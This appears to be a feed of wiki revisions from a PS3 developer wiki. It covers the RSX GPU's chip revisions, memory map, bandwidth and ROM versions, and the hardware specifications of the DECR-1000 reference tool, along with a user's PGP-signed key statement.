1-881-945-11 || [[CXD5300AGB]] || 40nm || ? 114mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-21xx]] || [[SUR-00x|SUR-001]] || 1-881-945-11 || [[CXD5300AGB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-25xx]] || [[JTP-00x|JTP-001]] || 1-882-481-11 || [[CXD5300A1GB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-25xx]] || [[JTP-00x|JTP-001]] || 1-882-481-21 || [[CXD5300A1GB]] || 40nm || ? 114mm² ? ||<br /> |-<br /> | [[CECH-25xx]] || [[JSD-00x|JSD-001]] || 1-882-770-11 || [[CXD5300A1GB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-30xx]] || [[KTE-00x|KTE-001]] || 1-884-749-11 || [[CXD5301DGB]] || 40nm || ? 114mm² ? || -<br /> |-<br /> | [[CECH-30xx]] || [[KTE-00x|KTE-001]] || 1-884-749-31 || [[CXD5301A1GB]] || 40nm || ? 114mm² ? || -<br /> |-<br /> | [[CECH-40xx]] || [[MSX-00x|MSX-001]] || 1-886-928-11 || [[CXD5302DGB]] || 40nm || ? 114mm² ? || -<br /> |-<br /> | [[CECH-40xx]] || [[MPX-00x|MPX-001]] || 1-887-233-11 || [[CXD5302A1GB]] || 40nm || ? 114mm² ? || - [http://pocketnews.cocolog-nifty.com/pkns/2012/10/ps3-cech-4000-e.html pocketnews dissasembly]<br /> |-<br /> |}<br /> Other unspecified: [[CXD297BGB]] and [[CXD2971-1GB]] (CECHA&lt;!--//Pereb//--&gt; refurbished? note:lowest FW was 2.30)<br /> ===Alternative list===<br /> * [[CECHAxx]]/[[COK-00x#COK-001|COK-001]], [[CECHBxx]]/[[COK-00x#COK-001|COK-001]], [[CECHCxx]]/[[COK-00x#COK-002|COK-002]], [[CECHExx]]/[[COK-00x#COK-002W|COK-002W]] and [[CECHHxx]]/[[DIA-00x#DIA-001|DIA-001]] : [[CXD2971AGB]] (RSX 90nm)<br /> * [[CECHGxx]]/[[SEM-00x|SEM-001]] : [[CXD2971DGB]] (RSX 90nm)<br /> * [[CECHJxx]]/[[DIA-00x#DIA-002|DIA-002]] and [[CECHKxx]]/[[DIA-00x#DIA-002|DIA-002]] : [[CXD2982]] (RSX 65nm)<br /> * [[CECHLxx]]/[[VER-00x|VER-001]] up to including [[CECHQxx]]/[[VER-00x|VER-001]] : [[CXD2991BGB]] (RSX 65nm)<br /> * [[CECH-20xx]]/[[DYN-00x|DYN-001]] : [[CXD2991GGB]] (RSX 65nm)<br /> * [[CECH-21xx]]/[[SUR-00x|SUR-001]] : [[CXD5300AGB]] (RSX 40nm)<br /> * [[CECH-25xx]]/[[JTP-00x|JTP-001]] and [[CECH-25xx]]/[[JSD-00x|JSD-001]]: [[CXD5300A1GB]] (RSX 40nm)<br /> * [[CECH-30xx]]/[[KTE-00x|KTE-001]] : [[CXD5301DGB]] (RSX 40nm)<br /> &lt;br /&gt;<br /> <br /> == Local GDDR3 Memory Physical Structure==<br /> * Total Memory 256MB<br /> * 2 Partitions (128MB)<br /> * 64bit bus per partition<br /> * 8 Banks per partition (16MB)<br /> * 4096 Pages per bank (4KB) -&gt; 12bit Row Address<br /> * Memory block in a page -&gt; 9bit Column Address<br /> * Minimum access granularity = 8 bytes -&gt; same as buswidth between RSX &lt;&gt; GDDR<br /> <br /> =Software=<br /> <br /> == RSX Memorymap ==<br /> <br /> Although the RSX has 256MB of GDDR3 RAM, not all of it is useable. The last 4MB is reserved for keeping track of the RSX internal state and issued commands. The 4MB of GPU Data contains RAMIN, RAMHT, RAMFC, DMA Objects, Graphic Objects, and the Graphic Context. The following is a breakdown of the address within 256MB of the RSX.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Address Range !! Size !! Comment<br /> |-<br /> | 0000000-FBFFFFF || 252 MB || Framebuffer<br /> |-<br /> | FC00000-FFFFFFF || 4 MB || GPU Data<br /> |-<br /> | FF80000-FFFFFFF || 512KB || RAMIN: Instance Memory<br /> |-<br /> | FF90000-FF93FFF || 16KB || RAMHT: Hash Table<br /> |-<br /> | FFA0000-FFA0FFF || 4KB || RAMFC: FIFO Context<br /> |-<br /> | FFC0000-FFCFFFF || 64KB || DMA Objects<br /> |-<br /> | FFD0000-FFDFFFF || 64KB || Graphic Objects<br /> |-<br /> | FFE0000-FFFFFFF || 128KB || GRAPH: Graphic Context<br /> |-<br /> |}<br /> <br /> Besides local GDDR3 memory, main XDR memory can be accessed by RSX too, which is limited to either:<br /> * 0MB - 256MB (0x00000000 - 0x0FFFFFFF)<br /> ::-or-<br /> * 0MB - 512MB (0x00000000 - 0x1FFFFFFF)<br /> <br /> ==Speed, Bandwidth, and Latency==<br /> <br /> System bandwith (theoretical maximum):<br /> *Cell to/from 256MB XDR : 25.6 GB/s<br /> *Cell to RSX (IOIFO): 20GB/s (practical : 15.8GB/s @ packetsize 128B)<br /> *Cell from RSX (IOIFI) : 15GB/s (practical : 11.9GB/s @ packetsize 128B)<br /> *RSX to/from 256MB GDDR3 : 20.8GB/s (@ 650MHz)<br /> <br /> Because of the aforementioned layout of the communication path between the different chips, and the latency and bandwidth differences between the various components, there are different access speeds depending on the direction of the access in relation to the source and destination. The following is a chart showing the speed of reads and writes to the GDDR3 and XDR memory from the viewpoint of the Cell and RSX. Note that these are measured speeds (rather than calculated speeds) and they should be worse if RSX and GDDR3 access are involved because these figures were measured when the RSX was clocked at 550Mhz and the GDDR3 memory was clocked at 700Mhz. The shipped PS3 has the RSX clocked in at 500Mhz (front and back end, although the pixel shaders run separately inside at 550Mhz). In addition, the GDDR3 memory was also clocked lower at 650Mhz.<br /> <br /> === speed table ===<br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Processor !! 256MB XDR !! 256MB GDDR3<br /> |-<br /> | Cell Read || 16.8GB/s || 16MB/s (15.6MB/s @ 650MHz)<br /> |-<br /> | Cell Write || 24.9GB/s || 4GB/s<br /> |-<br /> | RSX Read || 15.5GB/s || 22.4GB/s (20.8GB/s @ 650MHz)<br /> |-<br /> | RSX Write || 10.6GB/s || 22.4GB/s (20.8GB/s @ 650MHz)<br /> |-<br /> |}<br /> <br /> Because of the VERY slow Cell Read speed from the 256MB GDDR3 memory, it is more efficient for the Cell to work in XDR and then have the RSX pull data from XDR and write to GDDR3 for output to the HDMI display. This is why extra texture lookup instructions were included in the RSX to allow loading data from XDR memory (as opposed to the local GDDR3 memory).<br /> <br /> == ROM Versions ==<br /> <br /> These are the listed RSX ROM (aka Vbios) versions info we have collected from lv1 debug ouput<br /> <br /> DEH/DECR-1000:<br /> <br /> &lt;pre&gt;<br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: a01 420/600 vpe:ff shd:3f [AE0000915:0:1:16:b:f:1:1:1]<br /> <br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: a02 420/600 vpe:ff shd:3f [F9A458700:0:2:3:b:f:3:1:1][0:0:0:0:0:3]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/650 vpe:ff shd:5f [AE0000993:0:1:13:c:a:1:4:2][16:3:0:0:1:3:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/600 vpe:ff shd:77 [FCA684200:0:2:2:f:7:3:5:1][0:0:0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/650 vpe:ff shd:7d [G1A778601:1:2:15:7:10:3:7:2][16:3:0:0:1:3:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b02 500/650 vpe:ff shd:3f [G2A874100:1:2:e:4:6:3:9:2][16:3:0:0:1:2:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b03 500/650 vpe:ff shd:7b [GAB886100:1:2:17:f:5:3:f:2][16:3:0:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b03 500/650 vpe:ff shd:7b [GAB886100:1:2:4:7:5:3:f:2][16:3:0:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E106900:1:2:c:b:6:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E107200:1:2:a:6:3:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E078500:1:2:11:c:f:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> &lt;/pre&gt;<br /> <br /> RETAIL: <br /> &lt;pre&gt;<br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: b08 1f4/28a vpe:ff shd:3f [AP0004687:1:1:14:13:a:2:f:1][16:3:1:1:1:3:1][0:0:0]<br /> &lt;/pre&gt;<br /> <br /> Speculatively it is likely that the very first numbers are the actual rom version (a01, b01, b03, b07, b08...) despite Sony's documentation claiming otherwise, DECR-1000 units with rom version b07 and above (and perhaps some others that have not yet been encountered) are not capable of running any firmware lower than 1.60 (from sdk 160.008) this is because the rom version is unknown/unsupported in older lv1 which will fail to initialize the RSX hardware and will cause lv1 to output a &quot;rsx rom abort!&quot; message, this will in turn create an exception early in lv2 boot process as it tries to use the RSX and creates a hard brick several RSX related errors such as &quot;lv2(2): # __rsxaudio_intr_create_thread 983 ffffffff&quot; or &quot;graphics error 512 : 00012625 c221bbb0&quot; ; &quot;lv2(2): page fault handler (DSI): invalid access address 0x795d00e8!&quot;. <br /> <br /> There is nothing in the documentation warning you about this and there is nothing preventing you (or a legitimate developer) to install an unsupported firmware as the vsh allows updating/downgrading to 1.00 or higher and the min praxis for those units is actually lower than 1.00. (0.08 to be exact)<br /> Should this issue occur to you, other than sending the unit back to Sony for servicing, the only way to fix this is to flash an ebootrom (as lv0 still runs fine and is in charge of handling flashing the system memory through lcnslsrv) the problem with that is that sony never released/issued an ebootrom for a firmware higher than 1.00.002 , so officially one would have no choice but to return the unit, that said, considering the ebootrom format is not rocket science and is actually documented (it's a very slight variation of the coreos package format, there are no specific checks whatsoever preventing you from crafting your own, it is not hashed, nor encrypted), you could (as we did) convert the PUP file of a higher firmware and flash it onto the unit to get a full recovery.<br /> <br /> == RSX Libraries ==<br /> The RSX is dedicated to 3D graphics, and developers are able to use different API libraries to access its features. The easiest way is to use high level PSGL, which is basicially OpenGL|ES with programmable pipeline added in - but hardly anyone uses PSGL these days, preferring to use the native GPU command buffer generation library, libgcm.<br /> At a lower level developers can use LibGCM, which is an API that talks to the RSX at a lower level. PSGL is actually implemented on top of LibGCM. For the advanced programmer, you can program the RSX by sending commands to it directly using C or assembly. This can be done by setting up commands (via FIFO Context) and DMA Objects and issuing them to the RSX via DMA calls.<br /> <br /> == Drivers (WiP/reference) ==<br /> <br /> * [http://mandos.homelinux.org/~glaurung/git/ps3rsx.git/ ps3rsx.git]<br /> * [http://mandos.homelinux.org/~glaurung/git/xf86-video-ps3.git/ xf86-video-ps3.git]<br /> * [http://nouveau.freedesktop.org/wiki/ nouveau wiki]<br /> * [http://psp.jim.sh/svn/listing.php?repname=ps3ware&amp;path=%2Ftrunk%2Flibps3rsx%2Fsrc%2Ffifo%2F&amp;#a408e4e3f64f03a0a91e8200a1a873401 libps3rsx]<br /> * [http://www.mesa3d.org/cell.html Mesa/Gallium Cell Driver]<br /> * git://nouveau.git.sourceforge.net/gitroot/nouveau/envytools (docs are in hwdocs, commands are in the xml's in rnndb)<br /> <br /> [[PSL1GHT]]<br /> * http://psl1ght.net/wiki/Homebrew_status<br /> * https://code.google.com/p/rsxgl/ / https://github.com/gzorin/RSXGL<br /> * https://github.com/kakaroto/e17<br /> <br /> = Other References =<br /> *&lt;strike&gt;http://7track.org/~durandal/ps3dox/&lt;/strike&gt; http://lol.notsoldierx.com/~durandal/ps3dox/ // http://173.220.0.157/~durandal/ps3dox/<br /> *http://wiki.ps2dev.org/ps3:rsx<br /> *[http://download.nvidia.com/developer/cg/Cg_1.4/1.4.1/Cg-1.4.1_UsersManual.pdf Cg Toolkit User's Manual: A Developer's Guide to Programmable Graphics, Release 1.4.1]<br /> *The Cg Tutorial (ISBN: 0321194969, Addison-Wesley, 2003)<br /> * [http://www.multiupload.com/D1XJHRH6Z9 cg-shader-tutorial.pdf (535.94 KB)] + [https://github.com/Themaister/Emulator-Shader-Pack Git: Emulator-Shader-Pack ]<br /> * http://pastie.org/private/qbpm88aml03vq8jexxvnsa PS3 RSX Glevand<br /> <br /> * Good overview of quotes of how SPU's are used together with RSX for retail games:<br /> **[http://www.neogaf.com/forum/showthread.php?p=7598043 PS3 games list &amp; SPE usages part 1]<br /> **[http://www.neogaf.com/forum/showpost.php?p=7598610&amp;postcount=32 PS3 games list &amp; SPE usages part 2]<br /> <br /> <br /> <br /> {{Motherboard Components}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=User_talk:Mathieulh&diff=43524 User talk:Mathieulh 2017-01-23T02:00:00Z <p>Mathieulh: Added a signed statement regarding my PGP key and fingerprint.</p> <hr /> <div>-----BEGIN PGP SIGNED MESSAGE-----<br /> Hash: SHA512<br /> <br /> PGP Fingerprint: [https://keybase.io/mathieulh/pgp_keys.asc?fingerprint=df468c795d1a76ff75b2c3454679edef1b5bb192 DF46 8C79 5D1A 76FF 75B2 C345 4679 EDEF 1B5B B192]<br /> <br /> Proof: https://keybase.io/mathieulh<br /> -----BEGIN PGP SIGNATURE-----<br /> <br /> iQEcBAEBCgAGBQJYhWNOAAoJEKa4nBz3AlIIRNAIAIjbBgQJO/EsbOg2tmULmN9g<br /> Y+S4Pb3EsuRfbsd9kXersICYEJZGp86GIUfaF0dogR5kVdaNZP2aQKJ8QJCYi1d7<br /> TBXvotalS64imvPXWJjPxe2tkz08iCpVwrE53FVG8LUUDxEgOvrVzW9hzceERNzJ<br /> Cq3qCgzQ+Mnxi8XQ6VUMdNUo9IHPOfA5LoFZ+iuV9XHRIZjNX/GaInYthelieaT/<br /> e19BPRA/L6VyWq6odRNDw5rxptVkKuggXq56qHhTx/QWvTTTByWcaxgMMChLRsjp<br /> JaEwIOn0vjnYDMEx2oYUSnPMwag+lp5/SVNG2pK7JJegxAb4KVhQOqRlCIcB6ec=<br /> =4X9R<br /> -----END PGP SIGNATURE-----</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=DECR-1000&diff=43522 DECR-1000 2017-01-21T20:47:03Z <p>Mathieulh: fixed some inaccurate information.</p> <hr /> <div>= DECR-1000(A/J) =<br /> <br /> == Specifications ==<br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! [[:Category:Models|SubModels]]<br /> | [[DECR-1000A]] / [[DECR-1000J]]<br /> |-<br /> ! Type<br /> | 0x01<br /> |-<br /> ! Motherboard<br /> | [[TMU-520]]<br /> |-<br /> ! Flash Storage<br /> | [[K9F2G08U0M|2x 256MB NAND]]<br /> |-<br /> ! [[CELL BE]] / [[RSX]]<br /> | {{90nm}} / {{90nm}}<br /> |-<br /> ! [[South Bridge]]<br /> | [[CXD2973AGB-4]]<br /> |-<br /> ! [[Syscon Hardware|Syscon]]<br /> | [[CXR713F120A]]<br /> |-<br /> ! [[Communication Processor|CP]]<br /> | [[CXD9790GG]] [[TCP-520]]<br /> |-<br /> ! BDemu [[Harddrive]]<br /> | 400GB<br /> |-<br /> ! GameOS [[Harddrive]]<br /> | 400GB<br /> |-<br /> ! [[Bluray Drive]]<br /> | {{YES}}<br /> |-<br /> ! [[HDMI|HDMI Ports]]<br /> | 2<br /> |-<br /> ! [[:Category:Linux|OtherOS]]<br /> | {{NO}} (but [[Vsh.self|vsh.self]] or [[sysconf_plugin.sprx|sysconf_plugin.sprx]] can be patched to add the feature on 3.20 or older [[:Category:Linux|OtherOS]])<br /> |-<br /> ! [[USB|USB Ports]]<br /> | 6<br /> |-<br /> ! [[GbLAN|GbLAN Ports]]<br /> | 4 (1 for debugger) <br /> |-<br /> ! Serial Ports<br /> | 1 (Hidden next to LAN(DEV) lan port, used in SYSCON emergency updates)<br /> |-<br /> ! [[MultiCardReader|Flash Readers]]<br /> | Yes<br /> |-<br /> ! [[PS2_Compatibility|PS2 mode]]<br /> | {{NO}} (No Emotion Engine or Graphic Synthesizer on the motherboard, no [[Emulation#ps2emu|ps2emu software]] in the official firmware)<br /> |-<br /> ! [[PS1_Compatibility|PS1 mode]]<br /> | {{NO}} (No [[Emulation#ps1emu|ps1emu software]] in the official firmware)<br /> |-<br /> ! [[SA-CD]]<br /> | {{NO}} (The Bluray Drive is compatible but no software exists to play the discs in Official Reference Tool firmwares)<br /> |-<br /> ! [[Wifi|WiFi802.11b/g]]<br /> | {{YES}}<br /> |-<br /> ! SKU Release date<br /> | 2006<br /> |-<br /> ! [[SCEI PS3 SDK|SDK]] / [[System Software|Firmware]] support<br /> | =&amp;gt;1.0.0&lt;br /&gt;=&amp;gt;1.6.0 when refurbished/serviced (RSX rom version isn't supported on older hypervisor)&lt;br /&gt;&amp;nbsp;&amp;nbsp;or&lt;br /&gt;=&amp;gt;2.3.0 (Since Jan 2009)<br /> |-<br /> ! [[Template:Metbootldr|downgradeable Min. praxis]]<br /> | 0.08<br /> |-<br /> ! Other<br /> | contains prototype components, hardware is the same as the [[DEH-R1040]].<br /> |-<br /> ! [[Power Supply]] <br /> | nichihon [[ZSSR541iB]]<br /> * input: AC 100-240V 9.5-4A 50/60Hz (950-960 Watt)&lt;br /&gt;output:<br /> * DC+5V(Sub) 1.6A (8 W)<br /> * DC+3.3V 23A (75.9 W)<br /> * DC+5V 8.2A (41 W)<br /> * DC+12V 31.2A (374.4 W)&lt;!--// 2 labels exist: one stating 9.5-4A for whole range (brand unreadable), other only 9.5A (the highest current for the lowest supported voltage - &quot;nichihon&quot;) //--&gt;<br /> |}<br /> <br /> == Boards ==<br /> === Motherboard ===<br /> [[TMU-520]] [[1-871-645-11]], [[1-871-645-12]], [[1-871-645-13]] - Mainboard<br /> === SubBoards ===<br /> [[BMD-001]] [[1-871-575-11]] - Blu-ray drive controller board<br /> [[TAM-520]] [[1-871-636-11]] - Analog 4-ch. audio output<br /> [[TAV-520]] [[1-871-635-11]] - Analog AV out<br /> [[TBP-520]] [[1-871-644-11]] - Backplane for 2x SATA HDD + BD<br /> [[TCP-520]] [[1-871-646-11]] - Communication Processor board<br /> [[TEJ-520]] [[1-871-641-11]] - HDD Activity/Eject board<br /> [[TFL-520]] [[1-871-638-11]] - Front Panel LEDboard (GPI/GPO/Reset/Start...)<br /> [[TFP-520]] [[1-871-640-11]] - Front Panel Switchboard (GPI/GPO/Reset/Start...)<br /> [[TMR-520]] [[1-871-647-11]] - CP-helper board<br /> [[TMW-520]] [[0-347-825-02]] - Bt/Wifi board<br /> [[TSA-520]] [[1-871-639-11]] - BD PATA-&gt;SATA adapter<br /> [[TUU-520]] [[1-871-643-11]] - Front I/O (Foot-Sw/USB/CardReader)<br /> <br /> == Pictures ==<br /> &lt;Gallery&gt;<br /> File:DECR1000A-frontleft.jpg|[[DECR1000A]] - frontleft<br /> File:DECR1000A-front.jpg|[[DECR1000A]] - front<br /> File:DECR1000A-topback.jpg|[[DECR1000A]] - topback<br /> File:DECR1000A-controller-top.jpg|[[DECR1000A]] - controller top<br /> File:DECR1000A-controller-back.jpg|[[DECR1000A]] - controller back<br /> <br /> File:DECR1000A - back.jpg|[[DECR1000A]] - back<br /> File:DECR1000A - back label.jpg|[[DECR1000A]] - back label<br /> File:DECR1000A - bottom.jpg|[[DECR1000A]] - bottom<br /> File:DECR1000A - front.jpg|[[DECR1000A]] - front<br /> File:DECR1000A - front0.jpg|[[DECR1000A]] - front0<br /> File:DECR1000A - front1.jpg|[[DECR1000A]] - front1<br /> File:DECR1000A - front2.jpg|[[DECR1000A]] - front2<br /> File:DECR1000A - front3.jpg|[[DECR1000A]] - front3<br /> File:DECR1000A - front4.jpg|[[DECR1000A]] - front4<br /> File:DECR1000A - toplabel powerrating.jpg|[[DECR1000A]] - bottomlabel powerrating<br /> <br /> File:DECR-1000A - Nichicon ZSSR541iB 1-474-032-21 PSU labeling.jpg|[[DECR-1000A]] - Nichicon [[ZSSR541iB]] [[1-474-032-21]] [[Power Supply]] labeling<br /> &lt;/Gallery&gt;<br /> <br /> == Links ==<br /> <br /> [https://www.youtube.com/watch?v=lSnoCsZvQiM| Overview and the detailed explaination in French]<br /> &lt;br&gt;<br /> [https://mega.co.nz/#F!XcdAiZpb!-Zy5PmdUwDLKHAogZyvMuA| Pictures of the DECR-1000A boards]<br /> &lt;br&gt;<br /> [ftp://ip-240.net-80-236-71.issy.rev.numericable.fr/Multimedia/TEXT/Computers/Computer%20Architecture/PS3/Instruction_manual_e.pdf Instruction Manual]<br /> &lt;br&gt;<br /> https://fccid.io/AK8DEHR1000<br /> &lt;br&gt;<br /> https://fccid.io/pdf.php?id=686154<br /> <br /> == Comparison ==<br /> {{Reference Tool models}}<br /> <br /> <br /> {{Console Information}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=DECR-1000&diff=43518 DECR-1000 2017-01-21T17:39:14Z <p>Mathieulh: /* Specifications */ changed to match the existing template.</p> <hr /> <div>= DECR-1000(A/J) =<br /> <br /> == Specifications ==<br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! [[:Category:Models|SubModels]]<br /> | [[DECR-1000A]] / [[DECR-1000J]]<br /> |-<br /> ! Type<br /> | 0x01<br /> |-<br /> ! Motherboard<br /> | [[TMU-520]]<br /> |-<br /> ! Flash Storage<br /> | [[K9F2G08U0M|2x 256MB NAND]]<br /> |-<br /> ! [[CELL BE]] / [[RSX]]<br /> | {{90nm}} / {{90nm}}<br /> |-<br /> ! [[South Bridge]]<br /> | [[CXD2973AGB-4]]<br /> |-<br /> ! [[Syscon Hardware|Syscon]]<br /> | [[CXR713F120A]]<br /> |-<br /> ! [[Communication Processor|CP]]<br /> | [[CXD9790GG]] [[TCP-520]]<br /> |-<br /> ! BDemu [[Harddrive]]<br /> | 400GB<br /> |-<br /> ! GameOS [[Harddrive]]<br /> | 400GB<br /> |-<br /> ! [[Bluray Drive]]<br /> | {{YES}}<br /> |-<br /> ! [[HDMI|HDMI Ports]]<br /> | 2<br /> |-<br /> ! [[:Category:Linux|OtherOS]]<br /> | {{NO}}<br /> |-<br /> ! [[USB|USB Ports]]<br /> | 6<br /> |-<br /> ! [[GbLAN|GbLAN Ports]]<br /> | 4 (1 for debugger) <br /> |-<br /> ! Serial Ports<br /> | 1 (Hidden next to LAN(DEV) lan port, used in SYSCON emergency updates)<br /> |-<br /> ! [[MultiCardReader|Flash Readers]]<br /> | Yes<br /> |-<br /> ! [[PS2_Compatibility|PS2 mode]]<br /> | {{NO}} (No Emotion Engine or Graphic Synthesizer on the motherboard, no [[Emulation#ps2emu|ps2emu software]] in the official firmware)<br /> |-<br /> ! [[PS1_Compatibility|PS1 mode]]<br /> | {{NO}} (No [[Emulation#ps1emu|ps1emu software]] in the official firmware)<br /> |-<br /> ! [[SA-CD]]<br /> | {{NO}} (The Bluray Drive is compatible but no software exists to play the discs in Official Reference Tool firmwares)<br /> |-<br /> ! [[Wifi|WiFi802.11b/g]]<br /> | {{YES}}<br /> |-<br /> ! SKU Release date<br /> | 2006<br /> |-<br /> ! [[SCEI PS3 SDK|SDK]] / [[System Software|Firmware]] support<br /> | =&amp;gt;1.0.0&lt;br /&gt;=&amp;gt;1.6.0 when refurbished/serviced (RSX rom version isn't supported on older hypervisor)&lt;br /&gt;&amp;nbsp;&amp;nbsp;or&lt;br /&gt;=&amp;gt;2.3.0 (Since Jan 2009)<br /> |-<br /> ! [[Template:Metbootldr|downgradeable Min. praxis]]<br /> | 0.08<br /> |-<br /> ! Other<br /> | contains prototype components, hardware is the same as the [[DEH-R1040]].<br /> |-<br /> ! [[Power Supply]] <br /> | nichihon [[ZSSR541iB]]<br /> * input: AC 100-240V 9.5-4A 50/60Hz (950-960 Watt)&lt;br /&gt;output:<br /> * DC+5V(Sub) 1.6A (8 W)<br /> * DC+3.3V 23A (75.9 W)<br /> * DC+5V 8.2A (41 W)<br /> * DC+12V 31.2A (374.4 W)&lt;!--// 2 labels exist: one stating 9.5-4A for whole range (brand unreadable), other only 9.5A (the highest current for the lowest supported voltage - &quot;nichihon&quot;) //--&gt;<br /> |}<br /> <br /> == Boards ==<br /> === Motherboard ===<br /> [[TMU-520]] [[1-871-645-11]], [[1-871-645-12]], [[1-871-645-13]] - Mainboard<br /> === SubBoards ===<br /> [[BMD-001]] [[1-871-575-11]] - Blu-ray drive controller board<br /> [[TAM-520]] [[1-871-636-11]] - Analog 4-ch. audio output<br /> [[TAV-520]] [[1-871-635-11]] - Analog AV out<br /> [[TBP-520]] [[1-871-644-11]] - Backplane for 2x SATA HDD + BD<br /> [[TCP-520]] [[1-871-646-11]] - Communication Processor board<br /> [[TEJ-520]] [[1-871-641-11]] - HDD Activity/Eject board<br /> [[TFL-520]] [[1-871-638-11]] - Front Panel LEDboard (GPI/GPO/Reset/Start...)<br /> [[TFP-520]] [[1-871-640-11]] - Front Panel Switchboard (GPI/GPO/Reset/Start...)<br /> [[TMR-520]] [[1-871-647-11]] - CP-helper board<br /> [[TMW-520]] [[0-347-825-02]] - Bt/Wifi board<br /> [[TSA-520]] [[1-871-639-11]] - BD PATA-&gt;SATA adapter<br /> [[TUU-520]] [[1-871-643-11]] - Front I/O (Foot-Sw/USB/CardReader)<br /> <br /> == Pictures ==<br /> &lt;Gallery&gt;<br /> File:DECR1000A-frontleft.jpg|[[DECR1000A]] - frontleft<br /> File:DECR1000A-front.jpg|[[DECR1000A]] - front<br /> File:DECR1000A-topback.jpg|[[DECR1000A]] - topback<br /> File:DECR1000A-controller-top.jpg|[[DECR1000A]] - controller top<br /> File:DECR1000A-controller-back.jpg|[[DECR1000A]] - controller back<br /> <br /> File:DECR1000A - back.jpg|[[DECR1000A]] - back<br /> File:DECR1000A - back label.jpg|[[DECR1000A]] - back label<br /> File:DECR1000A - bottom.jpg|[[DECR1000A]] - bottom<br /> File:DECR1000A - front.jpg|[[DECR1000A]] - front<br /> File:DECR1000A - front0.jpg|[[DECR1000A]] - front0<br /> File:DECR1000A - front1.jpg|[[DECR1000A]] - front1<br /> File:DECR1000A - front2.jpg|[[DECR1000A]] - front2<br /> File:DECR1000A - front3.jpg|[[DECR1000A]] - front3<br /> File:DECR1000A - front4.jpg|[[DECR1000A]] - front4<br /> File:DECR1000A - toplabel powerrating.jpg|[[DECR1000A]] - bottomlabel powerrating<br /> <br /> File:DECR-1000A - Nichicon ZSSR541iB 1-474-032-21 PSU labeling.jpg|[[DECR-1000A]] - Nichicon [[ZSSR541iB]] [[1-474-032-21]] [[Power Supply]] labeling<br /> &lt;/Gallery&gt;<br /> <br /> == Links ==<br /> <br /> [https://www.youtube.com/watch?v=lSnoCsZvQiM| Overview and the detailed explaination in French]<br /> &lt;br&gt;<br /> [https://mega.co.nz/#F!XcdAiZpb!-Zy5PmdUwDLKHAogZyvMuA| Pictures of the DECR-1000A boards]<br /> &lt;br&gt;<br /> [ftp://ip-240.net-80-236-71.issy.rev.numericable.fr/Multimedia/TEXT/Computers/Computer%20Architecture/PS3/Instruction_manual_e.pdf Instruction Manual]<br /> &lt;br&gt;<br /> https://fccid.io/AK8DEHR1000<br /> &lt;br&gt;<br /> https://fccid.io/pdf.php?id=686154<br /> <br /> == Comparison ==<br /> {{Reference Tool models}}<br /> <br /> <br /> {{Console Information}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Template:Reference_Tool_models&diff=43515 Template:Reference Tool models 2017-01-21T16:49:46Z <p>Mathieulh: fixed some inaccurate information.</p> <hr /> <div>{{ed right|Reference Tool models}}<br /> <br /> {| border=&quot;1&quot; cellspacing=&quot;0&quot; cellpadding=&quot;5&quot; border=&quot;#999&quot; class=&quot;wikitable&quot; style=&quot;border:1px solid #999; border-collapse: collapse;&quot; <br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! Model !! [[IDPS|Type]] !! [[Motherboard Revisions|Board]] !! [[Flash_(Hardware)|Flash]] !! [[South_Bridge|SB]] !! [[Syscon_Hardware|Syscon]] !! [[Communication Processor|CP]] !! [[Harddrive|BDemu HDD]] !! [[Harddrive|GameOS HDD]] !! [[Bluray_Drive|Bluray Drive]] !! [[HDMI | HDMI Ports]] !! [[Flash:OtherOS|OtherOS]] !! [[CELL BE]] !! [[RSX]] !! [[USB|USB&lt;br/&gt;Ports]] !! [[GbLAN | GbLan&lt;br/&gt;Ports]] !! [[MultiCardReader|Flash&lt;br/&gt;Readers]] !! Support:&lt;br /&gt;[[Emulation#pspemu|PSP]]&lt;br /&gt;[[PS2_Compatibility|PS2]]&lt;br /&gt;[[Emulation#ps1emu|PS1]] !! SA-&lt;BR /&gt;CD !! WiFi&lt;br/&gt;802.11&lt;BR /&gt;b/g !! [[SKU_Models#Datecode_/_Manufacturing_Date|SKU&lt;br/&gt;Release&lt;br/&gt;date]] !! [[System_Software|SDK/FW &lt;br/&gt;support]] !! [[Template:Metbootldr|downgradeable&lt;br/&gt;Min.&lt;br/&gt;praxis]] !! 